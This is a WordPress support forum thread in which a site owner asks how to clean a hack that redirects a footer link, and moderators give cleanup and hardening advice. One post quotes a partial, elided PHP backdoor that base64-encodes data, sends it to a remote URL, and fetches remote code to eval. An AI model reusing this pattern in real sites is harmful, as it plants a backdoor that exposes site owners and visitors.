Support » Fixing WordPress » WordPress Link got Hacked

  • One of my friends footer link got hacked. His Powered by WordPress link points to differrnt url instead of I searched for exploits on his wordpress theme files.. And found that the hacked used this code to call the hacked URL.

    < ?=@get_wp_results(‘f’);? >

    I can’t find the injected code !! where is it databse or somewhere else.. Need help Guys… I am Just a Newb…

Viewing 15 replies - 1 through 15 (of 15 total)
  • any Updates..??


    Refer this article:


    Shane G.



    Forum Janitor

    Some theme authors change the URLs to point to their theme website. Is it a customised theme?

    Its a customized theme. It was pointing to before hack. i searched through internet and found the hacker injected some .php file with this code

    <? error_reporting(0);
    $str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".". base64_encode($d).".". base64_encode($e).".". base64_encode($f).".". base64_encode($g).".". base64_encode($h).".$s.". base64_encode($i) .".". base64_encode($j);
    else if(include(base64_decode("...").base64_decode("...")."/?".$str));
    else if($c=file_get_contents(base64_decode("...").$str))eval($c);
    }; ?>

    I deleted all the files. But his Powered by WordPress link points to differrnt url instead of I think the hacker injected something in the database.

    anyone.. Out there??? to help me out…

    I found some base64 code on Wp-admin .. also some new file names. I deleted those files. But no code in the database. Is there any way i can find that..??

    Koydin, your server would have to be badly misconfigured for those hacks to run in the first place, since there is no <?php tag in the code. If I were you, I’d start from scratch with a new server environment and a new copy of all the WordPress files.

    Koydin, have you checked out this thread ~ ~ it might be simply a matter of removing/editing the effected files from the backdoor ~

    and most of these are likely related to the same problem you may have ~

    koylin, can you help me put with this virus. i got hacked like you. but i don’t find the virus untyl now. Can you send me teh code that you found or some help. Thank you. And please hurry whyle all my blogs are hacked at this time on that hostgator server.

    Moderator Jan Dembowski


    Brute Squad and Volunteer Moderator

    Can you send me teh code that you found or some help.

    You’ve got a lot of work ahead of you. Here is the boiler plate links for delousing your hacked blog.

    How To Completely Clean Your Hacked WordPress Installation

    How to find a backdoor in a hacked WordPress

    RVoodoo has written up his experience too.

    Once you’ve cleaned out your installation, harden it to stop (or at least slow down) this from happening again.

    Goof luck.

    My problem is that i found the < ?=@get_wp_results(‘f’);? > code only in my footer but i dont found anything untyl now. And is changing my links but my footer don’t shows up. for example

    So i need to find a modified file or something so i can start to hount it down. But nothing untyl now. I searched in my database, i downloaded my whole website, and searching for “eval” “base64” and thesde tipe of codes in them.

    Moderator Jan Dembowski


    Brute Squad and Volunteer Moderator

    Sorry, but every file in your installation is suspect, as well as your database. That’s what it means to be hacked.

    If you want to fix it then you need to replace every file you can with the freshly downloaded original files, hunt through any files you have left, and scour your database.

    Anything less than that won’t find it. Once you have found it, then you need to close the door that the attacker came in through.

    It’s a metric ton of work but that’s what is needed. Once again, good luck. The work is outlined in those links.

    Yeah i understand that but untyl i don’t find the modified files i don’t want to replace anything. I remowed now the injected code from the footers and i’m wayting if will apear again howewer. I still hawe the virus in my sites. If it’s not only injected somehow.

Viewing 15 replies - 1 through 15 (of 15 total)
  • The topic ‘WordPress Link got Hacked’ is closed to new replies.